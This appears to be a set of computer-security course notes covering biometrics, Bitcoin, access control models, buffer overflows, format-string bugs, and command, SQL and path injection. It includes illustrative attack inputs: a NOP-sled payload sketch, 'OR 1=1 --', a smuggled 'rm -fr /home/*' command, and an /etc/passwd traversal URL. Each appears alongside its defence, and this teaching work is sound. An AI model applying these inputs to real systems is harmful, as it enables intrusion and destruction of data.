Regardless of which biometric is used, the important thing to make it useful for authentication is to identify the elements that make it distinctive. Most of us have swirls on our fingers. What makes fingerprints differ from finger to finger are variations in those swirls: ridge endings, bifurcations, enclosures, and other elements beyond a gently sloping curve. These features are called minutiae. The presence of minutiae, their relative distances from each other, and their relative positions allow us to express the unique aspects of a fingerprint as a relatively compact stream of bits rather than a bitmap.

Two important elements of biometrics are robustness and distinctiveness. Robustness means that the biometric data will not change much over time. Your fingerprints will look mostly the same next year and the year after. Your fingers might grow fatter (or thinner) over the years and at some point in the future, you might need to re-register your hand geometry data.

Distinctiveness relates to the differences in the biometric pattern among the population. Distinctiveness is also affected by the precision of a sensor. A finger length sensor will not measure your finger length to the nanometer, so there will be quantized values in the measured data. Moreover, the measurements will need to account for normal hand swelling and shrinking based on temperature and humidity, making the data even less precise. Accounting for these factors, approximately one in a hundred people may have hand measurements similar to yours. A fingerprint sensor may typically detect 40–60 distinct features that can be used for comparing with other sensed fingerprints. An iris scan, on the other hand, will often capture over 250 distinct features, making it far more distinctive and more likely to identify a unique individual.

Some sensed data is difficult to normalize. Here, normalization refers to the ability to align different sensed data to some common orientation. For instance, identical fingers might be presented at different angles to the sensors. The comparison algorithm will have to account for possible rotation when comparing the two patterns. The inability to normalize data makes it difficult to perform efficient searches. There is no good way to search for a specific fingerprint short of performing a comparison against each stored pattern. Data such as iris scans lends itself to normalization, making it easier to find potentially matching patterns without going through an exhaustive search.

In general, the difficulty of normalization and the fact that no two measurements are ever likely to be the same make biometric data a poor choice for identification. It is difficult, for example, to construct a system that will store hundreds of thousands of fingerprints and allow a user to identify and authenticate themselves simply by presenting their finger. Such a system would require an exhaustive search through the stored data, and each comparison would itself be time-consuming as it is not a simple bit-by-bit match test. Moreover, fingerprint data is not distinctive enough for a population of that size. A more realistic system will use biometrics for verification: users identify themselves through some other means (e.g., typing their login name) and then present their biometric data. In this case, the software only has to compare the pattern associated with that user.

The biometric authentication process comprises several steps:

  1. Enrollment. Before any authentication can be performed, the system needs to store the user’s biometric data to later use it for comparison. The user will have to present the data to the sensor, distinctive features need to be extracted, and the resulting pattern stored. The system may also validate if the sensed data is of sufficiently high quality or ask the user to repeat the process several times to ensure consistency in the data.

  2. Sensing. The biological component needs to be measured by presenting it to a sensor, a dedicated piece of hardware that can capture the data (e.g., a camera for iris recognition, a capacitive fingerprint sensor). The sensor captures the raw data (e.g., an image).

  3. Feature extraction. This is a signal processing phase where the interesting and distinctive components are extracted from the raw sensed data to create a biometric pattern that can be used for matching. This process involves removing signal noise, discarding sensed data that is not distinctive or not useful for comparisons, and determining whether the resulting values are of sufficiently good quality that it makes sense to use them for comparison. A barely-sensed fingerprint, for instance, may not present enough minutiae to be considered useful.

  4. Pattern matching. The extracted sample is now compared to the stored sample that was obtained during the enrollment phase. Features that match closely will have small distances. Given variations in measurements, it is unlikely that the distance will be zero, which would indicate a perfect match.

  5. Decision. The “distance” between the sensed and stored samples is now evaluated to decide if the match is close enough. The threshold chosen here determines whether the system favors more false rejects or more false accepts.

Security implications

Several security issues relate to biometric authentication.

Sensing
Unlike passwords or encryption keys, biometric systems require sensors to gather the data. The sensor, its connectors, the software that processes sensed data, and the entire software stack around it (operating system, firmware, libraries) must all be trusted and tamper-proof.
Secure communication and storage
The communication path after the data is captured and sensed must also be secure so that attackers will have no ability to replace a stored biometric pattern with one of their own.
Liveness
Much biometric data can be forged, so sensors need some assurance that they are measuring a living person. Molded “gummy” fingers can copy real fingerprints, photos of faces or eyes can fool cameras into believing they are looking at a real person, and recordings can defeat voice-based authentication systems.
Thresholds
Since biometric data relies on “close-enough” matches, you can never be sure of a certain match. You will need to determine what threshold is good enough and hope that you do not annoy legitimate users too much or make it too easy for the enemy to get authenticated.
Lack of compartmentalization
You have a finite set of biological characteristics to present. Fingerprints and iris scans are the most popular biometric sources. Unlike passwords, where you can have distinct passwords for each service, you cannot have this with biometric data.
Theft of biometric data
If someone steals your password, you can create a new one. If someone steals your fingerprint, you have nine fingerprints left and then none. If someone gets a picture of your iris, you have one more left. Once biometric data is compromised, it remains compromised.

Bitcoin & Blockchain

Bitcoin is the first blockchain-based cryptocurrency, designed as an open, distributed, and public system. It has no central authority, and anyone can participate in operating the network nodes.

Unlike a centralized system, which places trust in a third party like a bank, Bitcoin aims for complete decentralization. Centralized systems can fail if the trusted entity disappears, makes errors, or engages in fraudulent activity. Bitcoin’s decentralized, distributed ledger helps prevent fraud and central points of failure.

Cryptographic Building Blocks of Bitcoin

Bitcoin employs several core cryptographic concepts:

Hash Pointers

A hash pointer functions like a traditional pointer but stores both the location of the data it references and a cryptographic hash of that data. This structure verifies data integrity: altering the referenced data changes its hash, signaling tampering.

In Bitcoin’s blockchain, each block contains a hash pointer to the previous block, creating an immutable chain. An attacker attempting to alter data would have to modify every subsequent block, a computationally infeasible task due to Bitcoin’s proof-of-work requirement.

Merkle Trees

Merkle trees efficiently and securely verify large data sets. Each leaf node contains the cryptographic hash of an individual data block (or transaction). Internal nodes contain hashes derived by concatenating and hashing their child nodes' hashes. The process continues recursively, creating a tree structure. At the top of the tree is a single hash, called the Merkle root, summarizing all the transactions or data within the tree.

In Bitcoin, Merkle trees provide several key advantages:

  • Efficient Verification: Nodes can quickly confirm if a particular transaction is included within a block without needing the entire dataset. This verification requires only a minimal amount of data, known as a Merkle proof, significantly reducing computational and bandwidth requirements.

  • Scalability: Merkle proofs allow lightweight nodes, also known as Simplified Payment Verification (SPV) nodes, to verify transactions without storing the full blockchain, making Bitcoin more scalable and accessible.

  • Data Integrity: If a transaction is altered in any way, the change propagates upward, altering the Merkle root. This property makes any tampering immediately detectable by simply checking the Merkle root against the one recorded in the block header.

A Merkle proof consists of the set of hashes required to reconstruct the path from the transaction to the Merkle root. By comparing this reconstructed Merkle root against the root stored in the block header, nodes can efficiently validate transactions.

Public-Key Cryptography & Digital Signatures

Public-key cryptography underpins Bitcoin transactions. Each user generates a public-private key pair. The public key is openly shared, while the private key remains confidential. It’s computationally infeasible to derive the private key from its corresponding public key.

To create a Bitcoin transaction, the sender uses their private key to digitally sign the transaction, proving ownership of the funds being spent. Digital signatures validate message authenticity and integrity, allowing anyone to verify the transaction using the sender’s public key.

The Ledger and Bitcoin Network

Here’s a summary of Bitcoin’s primary concepts and security mechanisms:

Distributed Ledger, Blocks, and Blockchains:

Bitcoin uses a distributed ledger that publicly records all transactions since the network’s launch in January 2009. Transactions are grouped into blocks that are cryptographically linked to form a blockchain; altering a single block would require changing all subsequent blocks, securing the transaction history.

There is no master node and no authoritative master copy of the ledger. Anyone can run a Bitcoin node by downloading its software, connecting to known nodes, and performing peer discovery to integrate into the network. Peer discovery is the process by which a node connects to existing nodes, receives lists of additional nodes, and builds a complete view of the network, ensuring robust decentralization and connectivity.

Bitcoin Wallets:

Bitcoin wallets allow users to securely store and manage private keys. Wallets can take various forms, including software wallets (on devices or online), hardware wallets (physical devices), and paper wallets (printed keys).

User Identification (Addresses):

Bitcoin users create identities through public-private key pairs. Bitcoin addresses, derived from hashing public keys, provide a concise, user-friendly representation for transactions. Public keys do not reveal personal identities on their own; addresses simply make transactions shorter and less error-prone than full public keys.

Transaction Components (UTXO Model):

Bitcoin tracks funds through Unspent Transaction Outputs (UTXO). Transactions comprise:

  • Inputs: References to unspent outputs from previous transactions.
  • Outputs: New unspent outputs, assigned to destination addresses.
  • Change: Leftover funds returned to the sender.
  • Fees: Rewards paid to miners for validating transactions.

Double-Spending Problem:

Double spending—using the same bitcoin in multiple transactions—is prevented by the public ledger and miner validation, which ensure that each unspent output can be spent only once.

Privacy and Anonymity:

Bitcoin transactions are publicly visible, but identities are pseudonymous. Users are identified by addresses rather than personal identities. Enhanced privacy methods include transaction mixers or techniques like CoinJoin.

Block Structure:

Bitcoin blocks include a header (with timestamp, nonce, Merkle root, etc.) and a list of transactions. The header links blocks together, forming the blockchain.

Mining, Proof of Work (PoW), and Bitcoin Halving:

Mining adds new blocks to the blockchain. Miners solve computational puzzles by modifying block header data until its hash is below a specified target. This hash solution (proof of work) requires substantial computational resources, discouraging tampering.

Bitcoin halving occurs approximately every four years, reducing mining rewards by half, impacting mining profitability and controlling Bitcoin supply inflation.

Target Hash & Difficulty Adjustment:

The target hash sets mining difficulty. Bitcoin’s difficulty adjustment algorithm maintains approximately 10-minute intervals between blocks, adjusting complexity based on mining speed and computational power.

When two miners solve blocks simultaneously or attackers propose alternate chains, forks occur. Bitcoin resolves forks by adopting the chain with the most cumulative proof of work, which is usually the longest chain.

A 51% Attack arises if one entity controls more than half the mining power, risking reversed transactions, double spending, or blocking others, potentially undermining network security.

Access Control

Access control mechanisms manage how resources are accessed by users, processes, and devices, ensuring interactions with resources occur only as authorized. Effective access control involves setting policies, authenticating users, managing privileges, and auditing access events to prevent unauthorized use and security breaches.

Role of the Operating System

The Operating System (OS) functions as the primary gatekeeper for resources like CPU, memory, files, network connections, and devices. Through access control, the OS protects itself and isolates applications from each other. The Trusted Computing Base (TCB)—comprising the OS and supporting hardware—enforces security by managing which processes can access resources and under what conditions.

User Mode and Kernel Mode

Operating systems utilize two primary modes:

User Mode:
Applications operate with limited privileges, preventing direct hardware access and restricting sensitive instructions. Crashes remain isolated within applications, maintaining overall system stability.
Kernel Mode (Supervisor Mode):
Allows code running in kernel mode to manage all hardware and system resources directly, including memory management, hardware interactions, and process scheduling. Errors in kernel mode risk compromising the entire system.
Mode transitions from user mode to kernel mode occur through:
Traps:
Explicit instructions transferring control to kernel mode (e.g., system calls).
Violations:
Unauthorized actions by applications triggering kernel mode intervention.
Interrupts:
Hardware-generated events (e.g., timer signals, network packets) that temporarily pause the execution of a process, prompting the OS to handle immediate tasks.

Protection Rings

Protection Rings establish hierarchical access levels:

  • Ring 0: Highest privileges, reserved for OS kernel operations.
  • Ring 3: Lowest privileges, standard for user applications.

Intermediate rings (Rings 1 and 2) exist but are rarely used today, primarily due to complexity and practicality concerns.

Implementing Access Control

Protection Domains are security boundaries defining resource access permissions for processes or users.

They can be defined by an Access Control Matrix, which is a theoretical framework mapping subjects (users/processes) to objects (files/devices) with associated permissions. However, implementing an access control matrix is not practical due to its large size, complexity, and scalability issues in systems with many users and resources, making it difficult to store, manage, and efficiently query.

Practical implementations simplify this matrix through:

Access Control Lists (ACLs):
Permissions assigned directly to objects, specifying which subjects can perform actions.
Capability Lists:
Permissions associated with subjects, defining allowed actions across multiple objects, clearly specifying what each subject can access.

Unix (POSIX) Access Controls

Unix-like operating systems (e.g., Linux, FreeBSD, macOS) adhere to POSIX standards, which define common system interfaces and access control mechanisms.

Initially designed for simplicity, Unix access controls were compact and designed to use a fixed amount of space within an inode structure, which stores metadata about each file. This inode structure supported only three basic permission categories:

  1. Owner
  2. Group
  3. Others

Permissions include read, write, and execute actions. Although ACLs were later introduced to handle more complex scenarios, the original Unix access control model remains widely used today due to its simplicity and efficiency.

Setuid (Set User ID) allows executing files with the privileges of the file’s owner. While it enables temporary elevated permissions, it must be used carefully due to potential security risks.

Principle of Least Privilege

The principle of least privilege is an essential security concept designed to reduce risk by limiting access rights and permissions.

This principle grants users or programs only the permissions needed for their tasks, minimizing risk. One way to implement this is via privilege separation: splitting programs into components with distinct privileges:

Privileged Component:
Performs critical actions requiring higher permissions.
Unprivileged Component:
Manages non-critical operations with minimal privileges.

Access Control Models

  1. Discretionary Access Control (DAC): Permissions managed by resource owners, offering flexibility but risking security through user errors.

  2. Mandatory Access Control (MAC): Centrally enforced, rigid permissions based on system policies, reducing unauthorized access. MAC includes several specific models such as Multi-Level Security (MLS).

Multi-Level Security (MLS) and the Bell-LaPadula Model

MLS controls access based on user clearance and data classification levels. A primary MLS example is the Bell-LaPadula (BLP) model.

The BLP model focuses on confidentiality, enforcing two rules:

  • Simple Security (No Read Up): Users can’t access data above their clearance level.
  • Star Property (No Write Down): Users can’t write data to a lower security level, preventing data leaks.

Multilateral Security and Lattice Model

Multilateral security controls access using “compartments” or categories of information, ensuring users access only the compartments for which they have explicit authorization. Compartments typically represent separate areas or classifications of information (e.g., projects or departments), where access to one compartment does not imply access to another.

A Lattice Model graphically represents these combined hierarchical and compartmental permissions, effectively managing complex scenarios by visually demonstrating permissible flows of information between compartments and security levels.

Type Enforcement (TE) Model

The Type Enforcement model assigns security labels or “types” to users (subjects) and resources (objects). Permissions are then defined by rules governing how types interact. Instead of individual permissions, access control is enforced by checking if a subject’s type is authorized to perform certain actions on an object’s type.

TE effectively implements an access control matrix by explicitly defining allowed interactions between types (subjects) and resources (objects), providing a structured, manageable, and precise enforcement mechanism. TE provides strong, flexible control, commonly used in security frameworks like SELinux to enforce mandatory access control policies precisely.

Role-Based Access Control (RBAC)

Role-Based Access Control assigns permissions based on organizational roles rather than individual identities. Roles correspond to job functions or positions and include the permissions required to perform associated tasks. Users are assigned to roles, inheriting permissions that match their responsibilities. RBAC simplifies administration, reduces complexity, and enhances security by clearly associating access rights with organizational duties rather than individual users.

Roles differ from groups in that roles directly define permissions tied explicitly to job responsibilities, while groups are simply collections of users often organized for administrative convenience. Groups may be used for assigning permissions, but they often lack the explicit link to job responsibilities that roles enforce. RBAC provides a clearer and more scalable approach by directly linking permissions to organizational roles rather than group membership.

Biba Integrity Model

Unlike the Bell-LaPadula model, which focuses on not leaking secret information, the Biba model focuses on protecting data integrity by preventing unauthorized or untrustworthy modifications:

  • Simple Integrity Property (No Read Down): Prevents users from reading lower-integrity data. For example, a user with high-integrity clearance (such as an auditor) cannot read potentially corrupted or low-integrity data.
  • Star Integrity Property (No Write Up): Prevents low-integrity users from writing to higher-integrity data. For instance, an intern with low-integrity permissions cannot modify critical financial records classified at a higher integrity level.

Chinese Wall Model

The Chinese Wall model mirrors business requirements in industries such as law, banking, and consulting. It is designed to avoid conflicts of interest by restricting user access based on prior interactions. It organizes entities into “conflict-of-interest classes,” which group competing organizations together:

  • Simple Security Property: Users accessing data from one entity within a conflict-of-interest class cannot subsequently access data from competing entities within the same class. For example, a consultant who accesses Company A’s sensitive data cannot later access Company B’s competing sensitive data.
  • Star Property: Users can’t write to objects if they’ve accessed conflicting information, preventing data leakage between competing entities. For example, after viewing confidential data from Company A, the consultant cannot input or share information that could inadvertently benefit Company B.

This dynamic enforcement makes the model especially suitable for environments where conflicts of interest are context-sensitive and evolve over time.

Memory Safety: Buffer Overflows, Code Injection, and Control Flow Hijacking

Program hijacking refers to techniques that attackers use to take control of a program to execute unintended operations. One common method is code injection, where attackers insert malicious code into the program, altering its execution flow.

Buffer Overflows

Buffer overflow occurs when a program allocates memory (e.g., an array) but fails to verify that the data being copied fits within the allocated buffer. Excess data spills into adjacent memory, potentially overwriting critical information.

Languages like C, C++, and assembly are particularly vulnerable due to their lack of built-in array bounds checking. For example, the C library function strcpy(dest, src) copies a string into dest without ever knowing the destination buffer’s size.

Stack-based Overflows

How the Stack Works

When executing functions, the operating system allocates memory regions:

  • Text/Data segments: Executable code and static data.
  • Stack: Temporary storage for function parameters, return addresses, and local variables.
  • Heap: Dynamic memory allocation (malloc).

Upon calling a function, the stack stores the parameters, a return address, and a saved frame pointer. Together with the function’s local variables, these make up the function’s stack frame.

  • Stack Pointer (SP): Points to the top of the stack, indicating the next free memory location.
  • Frame Pointer (FP): Marks the base of the current stack frame, helping to reference local variables and parameters within the function.

When returning, the program:

  • Restores the stack pointer.
  • Retrieves the previous frame pointer.
  • Returns to the calling address.

Simple Stack Overflow

If a local buffer (e.g., char buf[128]) overflows, it can overwrite adjacent memory, including the return address stored on the stack. As a result, when the function attempts to return, execution jumps to an incorrect address, causing a program crash or unintended behavior. This becomes an availability attack: the program no longer works.

Code Injection via Stack Overflow

Attackers can exploit stack overflow vulnerabilities to execute malicious code. By carefully crafting the overflow data, attackers overwrite both the saved frame pointer and the return address on the stack. Specifically, the attacker:

  1. Injects malicious executable code into the buffer.

  2. Overwrites the saved frame pointer and the return address with addresses pointing back to this injected code.

Upon returning from the function, the processor jumps directly to the injected malicious code instead of the legitimate caller function.

NOP Slide (Landing Zone)

Attackers often use a NOP slide (landing zone) to increase their chances of a successful exploit. A NOP slide consists of numerous consecutive “no operation” (NOP) instructions placed before the injected malicious code. This technique allows attackers to be less precise about the exact buffer address:

Even if the overwritten return address points somewhere within the NOP slide, execution will simply slide through the NOPs and eventually execute the malicious payload. This provides flexibility and increases exploit reliability.
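
The payload structure described above can be sketched as a byte string. This is a hypothetical layout: the buffer size, the saved-register layout, and the guessed address are illustrative assumptions, not values from a real target.

```python
import struct

BUF_LEN   = 128                # size of the vulnerable buffer (assumed)
NOP       = b"\x90"            # x86 "no operation" opcode
shellcode = b"\xcc" * 24       # stand-in payload (INT3 opcodes, not real shellcode)
guess     = 0xBFFFF310         # attacker's rough guess of the buffer's address

sled = NOP * (BUF_LEN - len(shellcode))   # landing zone before the payload
payload = sled + shellcode                # fills the buffer exactly
payload += struct.pack("<I", guess)       # clobbers the saved frame pointer
payload += struct.pack("<I", guess)       # clobbers the return address
```

Any overwritten return address that lands anywhere in the 104-byte sled slides into the payload, which is why the sled makes imprecise address guesses survivable.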

Off-by-one Overflow

This subtle error occurs when a loop or copy operation exceeds a buffer’s bounds by a single byte. Common culprits include misuse of strncpy (for example, forgetting that it may leave the result unterminated, or writing the terminating byte one position past the end) and loops with incorrect boundary conditions (<= instead of <). Although an off-by-one error rarely overwrites the return address directly, it can overwrite the saved frame pointer or adjacent local variables, potentially redirecting execution when the function returns to its caller. An attacker might exploit this vulnerability by carefully adjusting memory contents so that execution flows to attacker-controlled code.

Heap Overflows

Heap overflows affect dynamically allocated memory (malloc). Unlike stack overflows, heap overflows do not directly overwrite return addresses or frame pointers. Instead, attackers exploit heap overflows by corrupting critical data structures, such as function pointers stored in the heap. By modifying these pointers, attackers can redirect execution to their injected malicious code.

Format String Attacks with printf

The printf function formats its output according to a format string, which may contain directives like %s or %d.

Reading Arbitrary Memory

If user-supplied input is mistakenly used directly as a format string, attackers can include additional %x directives, causing printf to read unintended data from the stack.

Example:

printf(user_input); // if user_input = "%x %x %x", printf will print arbitrary stack data.

Writing Arbitrary Memory

The %n directive writes the number of characters printed so far into the integer whose address is supplied as the corresponding argument. Attackers can exploit this to write controlled values to arbitrary memory locations, altering program execution flow.

Example:

printf(user_input); // if user_input = "%n", and the stack is manipulated, it writes to an attacker-controlled address.
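
The %n write primitive is specific to C, but the underlying mistake of letting user input serve as the format string exists in other languages too. A hedged Python sketch of the read-side analogue (the class and attribute names are invented for illustration):

```python
class ServerConfig:
    def __init__(self):
        self.api_key = "s3cr3t"        # sensitive attribute (hypothetical)

cfg = ServerConfig()
user_input = "{0.api_key}"             # attacker-supplied "format string"

# Vulnerable: the user's text becomes the template itself.
leaked = ("Hello, " + user_input).format(cfg)
print(leaked)                          # prints: Hello, s3cr3t

# Safe: treat the input strictly as data, never as a template.
safe = "Hello, {0}".format(user_input)
```

The fix mirrors the C rule printf("%s", user_input): pass user input only as an argument, never as the format.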

Defenses Against Hijacking Attacks

Safe Programming Practices

  • Use safer functions (strncpy instead of strcpy).
  • Implement rigorous bounds checking and testing through fuzzing, which involves automated tools repeatedly providing extremely large, malformed, or unexpected input strings to detect potential vulnerabilities.
  • Utilize languages with built-in array bounds checks, such as Java, Python, or C#.
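
The fuzzing idea can be sketched in a few lines: hammer a parser with random byte strings and record the inputs that raise errors. The parser here is a toy stand-in, not a real API.

```python
import random

def parse_port(data: bytes) -> int:
    # Toy parser (hypothetical): expects input such as b"port=8080".
    key, _, value = data.partition(b"=")
    return int(value)                  # raises ValueError on malformed input

random.seed(0)                         # make the fuzzing run reproducible
failures = []
for _ in range(500):
    blob = bytes(random.randrange(256) for _ in range(random.randrange(32)))
    try:
        parse_port(blob)
    except ValueError:
        failures.append(blob)          # candidate bug-triggering inputs
print(len(failures), "inputs raised errors")
```

Real fuzzers (such as AFL or libFuzzer) add coverage feedback and input mutation, but the principle is the same.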

Data Execution Prevention (DEP)

DEP prevents executing code from stack or heap memory regions by marking them as non-executable, supported by hardware (e.g., Intel’s NX bit).

Limitations and DEP Attacks

Attackers may circumvent DEP through:

  • Return-to-libc: This technique involves overwriting the return address to point to an existing, executable library function such as system() in libc. Rather than injecting new malicious code, the attacker manipulates existing system functionality to perform harmful actions.

  • Return Oriented Programming (ROP): ROP involves chaining short instruction sequences (“gadgets”) already present in the executable or libraries. Each gadget ends with a ret instruction, allowing the attacker to sequentially execute these code snippets to perform arbitrary operations without injecting new code.

Address Space Layout Randomization (ASLR)

ASLR randomizes memory locations of code and data segments at program startup, making it difficult for attackers to predict addresses needed for exploits. Programs must be compiled with Position Independent Code (PIC) to utilize ASLR effectively.

Stack Canaries

Stack canaries are special random values placed before return addresses on the stack. If a buffer overflow occurs, it typically overwrites the canary first. The compiler-generated code checks the canary before returning from functions; discrepancies indicate an overflow, preventing return address manipulation.

Stack canaries protect return addresses but do not guard against overwrites of other local variables. Compilers mitigate this by placing arrays above (at higher addresses than) scalar variables on the stack, so an overflowing array reaches the canary before it can corrupt other locals.
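
A minimal simulation of the canary mechanism (the frame layout, sizes, and addresses are illustrative, not a real ABI):

```python
import os, struct

CANARY = os.urandom(8)                 # random value chosen at process start

def new_frame(ret_addr: int) -> bytearray:
    # layout: 128-byte local buffer | 8-byte canary | 8-byte return address
    return bytearray(128) + CANARY + struct.pack("<Q", ret_addr)

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    frame[0:len(data)] = data          # no bounds check, like strcpy into the buffer

def function_return(frame: bytearray) -> int:
    if bytes(frame[128:136]) != CANARY:            # epilogue verifies the canary
        raise RuntimeError("stack smashing detected")
    return struct.unpack("<Q", frame[136:144])[0]  # safe to use the return address

frame = new_frame(0x401000)
unchecked_copy(frame, b"A" * 64)       # in bounds: canary intact, return succeeds
assert function_return(frame) == 0x401000

frame = new_frame(0x401000)
unchecked_copy(frame, b"A" * 140)      # overflow: clobbers the canary
# function_return(frame) would now raise "stack smashing detected"
```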

Intel’s Control-flow Enforcement Technology (CET)

Intel’s Control-flow Enforcement Technology introduces a shadow stack alongside the main stack, specifically to protect return addresses. This shadow stack is guarded by processor memory protections, preventing unauthorized modifications.

Control-flow instructions simultaneously update both stacks, and during returns, addresses from both stacks are compared. A mismatch triggers a fault, prompting the operating system to terminate the compromised process.

Integer Overflows and Underflows

Integer overflows and underflows occur when an arithmetic result falls outside the range that the integer type can represent. For signed integers (where overflow is technically undefined behavior in C, though two’s complement hardware typically wraps), the largest positive value wraps around to the most negative value and vice versa, producing unexpected sign changes.

In unsigned integers, overflow wraps the value around from the maximum to zero, causing unexpected smaller values. Underflow wraps the value from zero to the maximum possible positive value.

Specific Problems Caused by Integer Overflows and Underflows

  • Signed integer overflow: May result in logic errors, unexpected negative values, or incorrect loop behavior, potentially leading to buffer size miscalculations.
  • Unsigned integer overflow: Often leads to unexpectedly small array sizes or memory allocations, facilitating buffer overflow attacks due to insufficient memory allocation.
  • Underflow scenarios: Large positive values when subtracting from zero can cause unintended large memory allocations or logic errors.

Attackers exploit unexpected integer wrapping behavior to manipulate memory allocation, indices, or loop iterations, potentially leading to code execution or denial of service.
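
Since Python integers never wrap, 32-bit unsigned behavior can be emulated with a mask to illustrate the allocation-size problem described above (the element count is attacker-chosen for illustration):

```python
MASK32 = 0xFFFFFFFF                    # emulate 32-bit unsigned arithmetic

# Overflow: an attacker-supplied element count makes the size computation
# wrap, so far too little memory would be allocated.
count = 0x40000001                     # just over 2^30 elements
alloc_size = (count * 4) & MASK32
print(hex(alloc_size))                 # 0x4 -- only 4 bytes requested

# Underflow: subtracting from zero wraps to the maximum unsigned value.
remaining = (0 - 1) & MASK32
print(hex(remaining))                  # 0xffffffff
```

A subsequent copy of count elements into that 4-byte allocation is a classic heap overflow.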

Command Injection

Command injection occurs when attackers manipulate inputs to execute arbitrary commands in a command interpreter. This includes attacks targeting shell commands, databases, or interpreted languages.

SQL Injection

SQL injection attacks occur when user input directly becomes part of an SQL command, allowing attackers to alter the intended SQL logic.

For example:

sprintf(buf, "SELECT * FROM logininfo WHERE username = '%s' AND password = '%s';", uname, passwd);

If a user inputs:

' OR 1=1 --

the resulting query bypasses authentication:

SELECT * FROM logininfo WHERE username = '' OR 1=1 -- AND password = '';

Mitigation Strategies

One basic mitigation is to escape special characters in user inputs to prevent them from altering SQL statements. However, escaping characters manually is error-prone and can introduce vulnerabilities if not done properly.

A more robust mitigation is to use parameterized queries, ensuring user inputs cannot directly alter the structure of the SQL command:

Example: (using Python with SQLite)

import sqlite3
conn = sqlite3.connect('users.db')
cursor = conn.cursor()

cursor.execute("SELECT * FROM logininfo WHERE username=? AND password=?", (uname, passwd))

Parameterized queries clearly separate user input from the command structure, effectively preventing SQL injection.

Shell Attacks

Shell scripts (sh, bash, csh, etc.) are commonly exploited via command injection.

system() and popen() Vulnerabilities

C programs frequently use system() and popen() to run shell commands. Improper validation allows attackers to execute arbitrary commands. For example:

char command[BUFSIZE];
snprintf(command, BUFSIZE, "/usr/bin/mail -s \"system alert\" %s", user);
FILE *fp = popen(command, "w");

If the attacker inputs:

nobody; rm -fr /home/*

The resulting executed command becomes:

sh -c "/usr/bin/mail -s \"system alert\" nobody; rm -fr /home/*"

Python’s subprocess.call Vulnerabilities

Python’s subprocess.call is also vulnerable when used improperly:

import subprocess
subprocess.call("echo " + user_input, shell=True)

If user_input is not sanitized, attackers can execute arbitrary commands.

To safely sanitize input in POSIX shells, Python provides shlex.quote():

import subprocess, shlex
safe_input = shlex.quote(user_input)
subprocess.call("echo " + safe_input, shell=True)

Note that shlex.quote() is only suitable for POSIX-compatible shells and does not provide cross-platform protection.
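
An even safer pattern avoids the shell entirely by passing arguments as a list, so no shell ever parses the input. A sketch reusing the hostile input from the earlier example:

```python
import subprocess

user_input = "nobody; rm -fr /home/*"  # hostile input from the shell-attack example

# With an argument list and the default shell=False, ';' and '*' are just
# ordinary characters inside a single argument -- nothing gets interpreted.
result = subprocess.run(["echo", user_input], capture_output=True, text=True)
print(result.stdout)                   # the hostile string is echoed verbatim
```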

Environment Variable Manipulation

Manipulating the PATH environment variable allows attackers to run malicious commands placed in writable directories appearing before safe directories.

Additionally, variables like ENV or BASH_ENV may execute arbitrary scripts whenever a non-interactive shell starts.

Shared Library Injection

LD_PRELOAD (Linux)

LD_PRELOAD is an environment variable that specifies shared libraries to load before all others when running a program. It can be used for function interposition, which means intercepting and potentially overriding standard library functions. Attackers exploit this by preloading malicious libraries containing functions with the same names as legitimate ones, causing the malicious versions to be executed instead of the original implementations.

DLL Sideloading (Windows)

DLL sideloading is similar to LD_PRELOAD. Windows programs often load DLLs dynamically at runtime. Attackers exploit this by placing malicious DLLs with the same name as legitimate ones in directories where Windows searches for dependencies first (e.g., the program’s current directory). When the legitimate program runs, it inadvertently loads the malicious DLL, executing attacker-controlled code.

Microsoft .LNK File Vulnerabilities

Microsoft shortcut files (.LNK) can execute arbitrary commands or load malicious libraries when a user simply views them in Windows Explorer. Attackers exploit this behavior to distribute malware or execute unauthorized commands.

Path Traversal and Path Equivalence Vulnerabilities

Path Traversal Vulnerabilities

Path traversal vulnerabilities occur when attackers use input containing special characters such as ../ to navigate to directories or files that they should not have access to. This allows attackers to read, modify, or execute unauthorized files.

Path Equivalence Vulnerabilities

Path equivalence vulnerabilities exploit the fact that a single resource can be referenced by multiple different representations, such as symbolic links or encoded paths. Attackers use alternative representations to bypass security controls and gain unauthorized access.

For example, attackers attempt access with URLs like:

http://example.com/../../../etc/passwd

Proper validation and canonicalization are essential to prevent both types of attacks.
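
Canonicalization in practice: resolve the requested path first, then verify the result still lies inside the intended base directory (the base directory name is an assumption for illustration):

```python
import os

BASE = "/var/www/html"                 # directory we intend to serve (assumed)

def is_safe(requested: str) -> bool:
    # Canonicalize (resolving "..", ".", and symlinks), then check containment.
    full = os.path.realpath(os.path.join(BASE, requested))
    return full == BASE or full.startswith(BASE + os.sep)

print(is_safe("index.html"))           # True
print(is_safe("../../../etc/passwd"))  # False
```

Scanning the raw string for "../" before canonicalizing is not enough, since encoded or equivalent representations can slip through.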

File Descriptor Vulnerabilities

File descriptor vulnerabilities occur when programs improperly handle the standard file descriptors (0: stdin, 1: stdout, 2: stderr). Attackers can exploit situations where these descriptors are unexpectedly closed or redirected:

  • An attacker closes a standard file descriptor before executing a privileged program, causing the program to inadvertently open a sensitive file with that descriptor number. For example:
./privileged_program >&-

This command closes the stdout descriptor, so the next file the privileged program opens is assigned descriptor 1 (stdout). Anything the program subsequently writes to stdout then goes into that file, potentially corrupting it or leaking sensitive output.

Proper validation of file descriptor states and explicit descriptor management can mitigate this type of vulnerability.

TOCTTOU (Time of Check to Time of Use) Attacks

TOCTTOU vulnerabilities occur when a resource’s security properties change between the time they are checked and when they are used, allowing race conditions. A classic example:

  1. A privileged program generates a temporary file name with mktemp (which returns a unique name but does not open the file) and checks that the name is safe to use.
  2. Before the program uses the temporary file, an attacker replaces it with a symbolic link pointing to a sensitive file, such as /etc/passwd.
  3. The program then opens or modifies the sensitive file, causing unauthorized access or damage.

Using secure functions like mkstemp() or mkdtemp() that securely create and open temporary files mitigates this vulnerability.
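
In Python, the same guarantee comes from the tempfile module, which wraps mkstemp:

```python
import os, tempfile

# mkstemp atomically creates AND opens a uniquely named file (mode 0600),
# leaving no check-to-use window for an attacker to swap in a symlink.
fd, path = tempfile.mkstemp(prefix="report-")
try:
    os.write(fd, b"scratch data")
finally:
    os.close(fd)
    os.unlink(path)                    # clean up the temporary file
```

By contrast, generating a name with the deprecated tempfile.mktemp() and opening it separately recreates exactly the race described above.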

Unicode Parsing Vulnerabilities

Incorrect parsing of Unicode characters can lead to bypassing access restrictions. For example, Microsoft’s IIS server failed to correctly handle multi-byte Unicode characters, allowing attackers to circumvent security checks and access files or execute commands.

Comprehension Errors

Security vulnerabilities often result from comprehension errors where developers misunderstand the nuances of system operations or APIs. Examples include:

  • Incorrectly sanitizing special characters.
